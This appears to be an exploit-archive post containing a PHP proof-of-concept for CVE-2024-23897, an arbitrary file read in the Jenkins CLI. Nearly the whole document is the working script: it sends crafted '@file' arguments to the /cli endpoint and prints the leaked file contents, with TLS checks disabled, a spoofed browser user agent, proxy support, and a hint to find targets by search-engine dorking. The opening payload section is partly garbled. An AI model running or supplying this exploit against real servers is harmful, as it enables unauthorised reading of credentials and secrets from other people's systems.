============================================================================================================================================= | # Title : Jenkins 2.441 read files Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://www.jenkins.io/changelog/2.441/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: read files in Jenkins (Related : https://packetstorm.news/files/id/188696/ Related CVE numbers: CVE-2024-23897 ) . [+] save code as poc.php. [+] Usage: php script.php -u -f [-p ] [+] PayLoad : [ 'verify_peer' => false, 'verify_peer_name' => false, ] ]); // تعريف الثوابت للألوان في الإخراج const RED = "\033[91m"; const GREEN = "\033[92m"; const YELLOW = "\033[93m"; const ENDC = "\033[0m"; const ENCODING = "UTF-8"; // دالة لإنشاء بيانات الطلب لجينكينز function jenkins_arg($string, $operation) { $out_bytes = "\x00\x00"; $out_bytes .= pack("n", strlen($string) + 2); $out_bytes .= chr($operation); $out_bytes .= pack("n", strlen($string)); $out_bytes .= $string; return $out_bytes; } // دالة لإرسال طلب تحميل الملف function send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy) { usleep(300000); $data = jenkins_arg("connect-node", 0) . jenkins_arg("@" . $file_path, 0) . jenkins_arg(ENCODING, 2) . jenkins_arg("en", 1) . jenkins_arg("", 3); $opts = [ 'http' => [ 'method' => 'POST', 'header' => [ "User-Agent: $useragent", "Session: $uuid_str", "Side: upload", "Content-type: application/octet-stream" ], 'content' => $data, 'timeout' => 3 ] ]; if ($proxy) { $opts['http']['proxy'] = $proxy; $opts['http']['request_fulluri'] = true; } $context = stream_context_create($opts); @file_get_contents($url . "/cli?remoting=false", false, $context); } // دالة لإرسال طلب تنزيل الملف function send_download_request($url, $uuid_str, $useragent, $proxy) { $opts = [ 'http' => [ 'method' => 'POST', 'header' => [ "User-Agent: $useragent", "Session: $uuid_str", "Side: download" ], 'timeout' => 3 ] ]; if ($proxy) { $opts['http']['proxy'] = $proxy; $opts['http']['request_fulluri'] = true; } $context = stream_context_create($opts); $response = @file_get_contents($url . "/cli?remoting=false", false, $context); if (strpos($response, "No such file:") !== false) { echo "File does not exist\n"; return false; } if (strpos($response, "No such agent") !== false) { preg_match_all('/No such agent \"(.*?)\"/', $response, $matches); return isset($matches[1]) ? implode("\n", $matches[1]) : ""; } return trim(str_replace("\x00", "\n", $response)); } // دالة لقراءة الملف عبر Jenkins function read_file($url, $file_path, $useragent, $proxy) { $uuid_str = uniqid(); send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy); $file_contents = send_download_request($url, $uuid_str, $useragent, $proxy); if ($file_contents) { echo $file_contents . "\n"; } else { echo "\n"; } } // تنفيذ الكود $options = getopt("u:f:p:", ["url:", "file:", "proxy:"]); $url = $options['u'] ?? $options['url'] ?? ''; $file = $options['f'] ?? $options['file'] ?? ''; $proxy = $options['p'] ?? $options['proxy'] ?? ''; $useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"; if (!$url || !$file) { exit("Usage: php script.php -u -f [-p ]\n"); } read_file($url, $file, $useragent, $proxy); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================